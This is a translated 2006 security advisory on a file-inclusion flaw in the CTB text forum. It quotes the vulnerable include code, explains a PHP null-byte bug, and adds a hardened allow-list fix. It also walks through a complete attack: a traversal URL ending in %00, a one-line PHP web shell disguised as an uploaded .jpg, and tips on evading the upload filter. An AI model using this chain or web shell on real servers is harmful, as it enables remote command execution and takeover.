CTB arbitrary file include vulnerability - vulnerability warning - The Black Bar Safety Net

2006-10-05T00:00:00
ID MYHACK58:62200612123
Type myhack58
Reporter Anonymous (佚名)
Modified 2006-10-05T00:00:00

Description

Introduction

CTB (China Text Bulletin) is a free domestic text-mode forum. Because its code is relatively mature and a text forum is convenient to use, it is deployed quite widely in China. A while ago, while roughly going through the forum code, I found an XSS vulnerability, but school kept me busy and I did not dig any deeper. Over this year's New Year I looked at the code again and found a point of significant security risk.

Affected version

CTB 1.73 beta1. Earlier versions should also be affected, but given limited conditions I was not able to test each version one by one.

index.php does not sufficiently validate or filter the user-submitted mods variable. As a result, a remote attacker can combine this with a vulnerability in PHP itself to execute PHP code and thereby obtain file-operation permissions on the server.

The relevant part of index.php is as follows:

// Vulnerable as shipped: $mods comes straight from the request, is only checked for existence, and is then included.
if (!file_exists("./mods/" . $mods . ".php")) {
    $mods = "main";
}
require_once("./mods/" . $mods . ".php");


The forum's developers clearly did not guard the mods variable adequately. The code first checks whether the file exists and, if it does, includes it directly. An attacker can therefore put a number of ../ sequences in the mods variable to move up the directory tree, so that the program includes and executes PHP code of the attacker's choosing! Of course, one might object that only the $mods part is under our control, since the program automatically appends a .php suffix. Obviously, if a remote attacker could upload a .php file to the server directly, he would not bother with this vulnerability at all :)
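For comparison, here is an added example of how the include above should have been written; this is not CTB's own code. It assumes modules live under ./mods/ as <name>.php and that module names are plain identifiers, so any input containing ../, a null byte or a directory separator is rejected before it ever reaches the filesystem.

```php
<?php
// Added example (not CTB's own code): hardened replacement for the
// `$mods` include. Assumes modules are ./mods/<name>.php with plain names.
declare(strict_types=1);

function resolve_mod(string $mods, string $modsDir): string
{
    // 1. Syntactic allow-list: only [a-z0-9_], so "../", "\0" (%00) and
    //    directory separators can never reach file_exists()/require.
    if (!preg_match('/^[a-z0-9_]{1,32}$/', $mods)) {
        return 'main';
    }
    $base = realpath($modsDir);
    $path = realpath($modsDir . '/' . $mods . '.php');
    // 2. Semantic check: the resolved file must still sit inside mods/.
    //    realpath() follows symlinks, so a symlinked module that points
    //    outside the directory is rejected as well.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return 'main';
    }
    return $mods;
}

// Demonstration against a constructed temporary mods/ directory.
$tmp = sys_get_temp_dir() . '/ctb_demo_' . getmypid();
mkdir($tmp . '/mods', 0700, true);
file_put_contents($tmp . '/mods/main.php', "<?php\n");
file_put_contents($tmp . '/mods/forum.php', "<?php\n");
file_put_contents($tmp . '/secret.php', "<?php\n");   // exists, but outside mods/

$cases = [
    'forum',                                  // legitimate module
    '../data/upfile/2_1_1118989409.jpg',      // traversal from the advisory
    "../data/upfile/2_1_1118989409.jpg\0",    // same, with the null byte
    '../secret',                              // existing file outside mods/
    'main',
];
foreach ($cases as $c) {
    printf("%-45s -> %s\n", json_encode($c), resolve_mod($c, $tmp . '/mods'));
}

// Usage in index.php would be:
//   $mods = resolve_mod($_GET['mods'] ?? 'main', __DIR__ . '/mods');
//   require_once __DIR__ . '/mods/' . $mods . '.php';

array_map('unlink', glob($tmp . '/mods/*.php'));
unlink($tmp . '/secret.php');
rmdir($tmp . '/mods');
rmdir($tmp);
```

Only the legitimate module name survives; every hostile input falls back to main, and the fallback happens before any filesystem call is made with the raw value.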

PHP itself has security vulnerabilities that happen to suit our purpose: PHP 4.3.9 has a character-handling vulnerability that lets an attacker read arbitrary files. PHP 4.3.6 through 4.3.9 and PHP 5.0.0 through 5.0.2 have a bug that lets an attacker construct an uploaded file name that crosses directory boundaries. These vulnerabilities exist in both the win32 and unix builds, and win32 is the more vulnerable!

addslashes() vulnerability

In the addslashes() function the null byte is handled incorrectly. When a file is included via include or require using user-supplied input for the file name, an attacker can exploit this to read files.

addslashes() is supposed to convert the null byte (written as %00 in this article) to \0. In PHP 4.3.9, however, the null byte is converted to \%00; in include and require everything after this character is ignored, so the attacker can truncate the file name that include loads. The last remaining character is a backslash, and on Windows the backslash is a directory separator. In PHP 4.3.9 the characters before that backslash form the file name that gets loaded. For a detailed description and patch, refer to the official announcement.

Combined with our earlier code analysis, it is easy to see that we only need to combine this vulnerability with some manipulation of the mods variable to achieve our goal.

For example:

http://www.target.com/ctb/index.php?mods=../data/upfile/2_1_1118989409.jpg%00&forumid=1&postid=2&p=1


We specify mods=../data/upfile/2_1_1118989409.jpg%00

Because of the vulnerability in PHP itself and the CTB code, the file CTB finally includes will be:

require_once("./data/upfile/2_1_1118989409.jpg");


What if a PHP Trojan was written inside that jpg? Heh heh, you can imagine the consequences.

By now it should be very clear: using this vulnerability we can write a short PHP Trojan to execute commands. However, note that certain characters must be avoided when uploading, because the upload handler rejects them:

// CTB's upload filter: attachments containing 'form' or 'javascript' are deleted and refused.
if (stristr($uploadFileContent, 'form') !== false or stristr($uploadFileContent, 'javascript') !== false) {
    unlink($uploadNewPath);
    $this->showMsg("upload attachments containing the system prohibits the characters, please modify the compressed or packaged after to re-upload");
}


Write the one-line Trojan:

<?php system($sniper); ?>


Save it as a .jpg file, upload it, find its path after the upload, and then include it through index.php. Execute it, and that's it. What do you want? Right, heh heh; if the server has the system function disabled, think of your own way around it, which is outside the scope of this discussion. PHP's functions are pretty powerful :)